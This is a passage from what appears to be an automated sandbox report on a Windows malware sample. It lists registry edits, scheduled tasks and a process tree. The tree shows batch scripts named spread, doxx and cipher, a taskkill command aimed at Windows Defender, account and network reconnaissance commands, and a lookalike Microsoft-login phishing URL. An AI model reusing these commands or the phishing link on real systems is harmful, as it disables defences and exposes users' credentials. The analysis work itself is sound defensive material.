| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29\IEFixedFontName = "Gadugi" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\18 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEFixedFontName = "Vani" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEFixedFontName = "Kokila" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19\IEFixedFontName = "Cordia New" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\32\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37\IEFixedFontName = "Leelawadee UI" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\39\IEPropFontName = "Mongolian Baiti" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7\IEFixedFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12\IEPropFontName = "Raavi" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6\IEFixedFontName = "Courier New" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8\IEFixedFontName = "Courier New" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEFixedFontName = "Iskoola Pota" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5\IEFixedFontName = "Courier New" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24\IEFixedFontName = "MS Gothic" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName = "Courier New" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24\IEPropFontName = "MS PGothic" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27\IEFixedFontName = "Ebrima" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13\IEPropFontName = "Shruti" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13\IEFixedFontName = "Shruti" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22\IEPropFontName = "Sylfaen" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28\IEFixedFontName = "Gadugi" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\9\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\21\IEFixedFontName = "Microsoft Himalaya" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12\IEFixedFontName = "Raavi" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20\IEFixedFontName = "Leelawadee UI" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33\IEFixedFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19\IEPropFontName = "Leelawadee UI" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25\IEPropFontName = "PMingLiu" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30\IEPropFontName = "Microsoft Yi Baiti" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31\IEFixedFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEPropFontName = "Iskoola Pota" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14\IEFixedFontName = "Kalinga" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\17\IEFixedFontName = "Tunga" | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\URL Protocol | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell\open | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\\bloatware\\3.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\ = "URL:psiphon" | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell\open\command | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\vir.exe
"C:\Users\Admin\AppData\Local\Temp\vir.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\!main.cmd" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K spread.cmd
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K doxx.cmd
C:\Windows\SysWOW64\PING.EXE
ping google.com -t -n 1 -s 4 -4
C:\Windows\SysWOW64\xcopy.exe
xcopy 1 C:\Users\Admin\Desktop
C:\Windows\SysWOW64\ipconfig.exe
ipconfig
C:\Windows\SysWOW64\xcopy.exe
xcopy 2 C:\Users\Admin\Desktop
C:\Windows\SysWOW64\net.exe
net accounts
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts
C:\Windows\SysWOW64\xcopy.exe
xcopy 3 C:\Users\Admin\
C:\Windows\SysWOW64\net.exe
net user
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user
C:\Windows\SysWOW64\tasklist.exe
tasklist /apps /v /fo table
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im WindowsDefender.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K handler.cmd
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K cipher.cmd
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe
Rover.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\web.htm
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Google.exe
Google.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
